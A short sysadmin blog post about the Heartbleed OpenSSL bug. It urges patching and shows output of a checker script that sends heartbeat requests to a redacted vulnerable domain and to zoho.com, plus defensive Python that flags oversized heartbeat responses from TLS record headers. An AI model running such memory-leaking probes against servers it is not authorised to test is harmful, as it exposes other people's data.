Heart Bleed Bug – OpenSSL – part 2

I maintain more than 30 servers and a number of them were affected by the Heartbleed bug. CentOS released an update for the OpenSSL package(s), so there are no excuses not to update (yum update openssl, … ).

Meanwhile, there are a lot of sysadmins who still haven't done anything to protect their servers and customers (https://gist.github.com/dberkholz/10169691).

Testing REMOVED.com, for example:

    ~/Downloads $ ./check.py REMOVED.com
    Connecting...
    Sending Client Hello...
    Waiting for Server Hello...
     ... received message: type = 22, ver = 0302, length = 58
     ... received message: type = 22, ver = 0302, length = 4837
     ... received message: type = 22, ver = 0302, length = 4
    Sending heartbeat request...
     ... received message: type = 24, ver = 0302, length = 16384
    Received heartbeat response:
      [hex dump of the returned data omitted]
    WARNING: server returned more data than it should - server is vulnerable!

For security reasons, the actual domain I tested is replaced with "REMOVED".

Some hosts from the list I posted above are already patched (which is good):

    ~/Downloads $ ./check.py zoho.com
    Connecting...
    Sending Client Hello...
    Waiting for Server Hello...
     ... received message: type = 22, ver = 0302, length = 66
     ... received message: type = 22, ver = 0302, length = 2399
     ... received message: type = 22, ver = 0302, length = 331
     ... received message: type = 22, ver = 0302, length = 4
    Sending heartbeat request...
    Unexpected EOF receiving record header - server closed connection
    No heartbeat response received, server likely not vulnerable
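The two outcomes above can also be told apart passively, from TLS record headers alone, which is how a network sensor would see them. The following is an added example, not part of check.py or of the original post: it sums heartbeat record sizes (content type 24) in each direction and flags a server that returns far more than it was sent. The server-side record lengths are taken from the two transcripts; the client-side lengths, the `SLACK` allowance and all function names are assumptions.

```python
import struct

HANDSHAKE, HEARTBEAT = 22, 24   # TLS record content types (24: RFC 6520)
SLACK = 64                      # assumed allowance for padding/MAC differences

def record(ctype: int, length: int, version: int = 0x0302) -> bytes:
    """Build a TLS record with an all-zero body (constructed test data)."""
    return struct.pack(">BHH", ctype, version, length) + bytes(length)

def parse_records(stream: bytes):
    """Yield (content_type, version, length) for each complete record."""
    off = 0
    while off + 5 <= len(stream):
        ctype, version, length = struct.unpack_from(">BHH", stream, off)
        if off + 5 + length > len(stream):
            break                      # truncated capture: stop, don't guess
        yield ctype, version, length
        off += 5 + length

def heartbeat_bytes(stream: bytes) -> int:
    """Total body bytes carried in heartbeat records of one direction."""
    return sum(n for ctype, _, n in parse_records(stream) if ctype == HEARTBEAT)

def classify(client_stream: bytes, server_stream: bytes) -> str:
    """Compare heartbeat volume per direction using record headers only."""
    sent, got = heartbeat_bytes(client_stream), heartbeat_bytes(server_stream)
    if got == 0:
        return "no-heartbeat-response"
    if got > sent + SLACK:
        return "over-sized-response"   # server returned more than it was sent
    return "echo-ok"

# Constructed flows. Server-side record lengths are the ones in the two
# transcripts above; client-side lengths (200, 19) are made up.
CLIENT = record(HANDSHAKE, 200) + record(HEARTBEAT, 19)
LEAKY = b"".join(record(HANDSHAKE, n) for n in (58, 4837, 4)) + record(HEARTBEAT, 16384)
PATCHED = b"".join(record(HANDSHAKE, n) for n in (66, 2399, 331, 4))
HEALTHY = record(HANDSHAKE, 66) + record(HEARTBEAT, 19)

if __name__ == "__main__":
    for name, srv in (("leaky", LEAKY), ("patched", PATCHED), ("healthy", HEALTHY)):
        print(name, classify(CLIENT, srv))
```

Because it reads only the 5-byte record header, the same comparison applies when the heartbeat is sent after the handshake and the record bodies are encrypted.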

Throwing rocks at the OpenSSL developers isn't a great idea. Donating money for paid developers is a much better option…
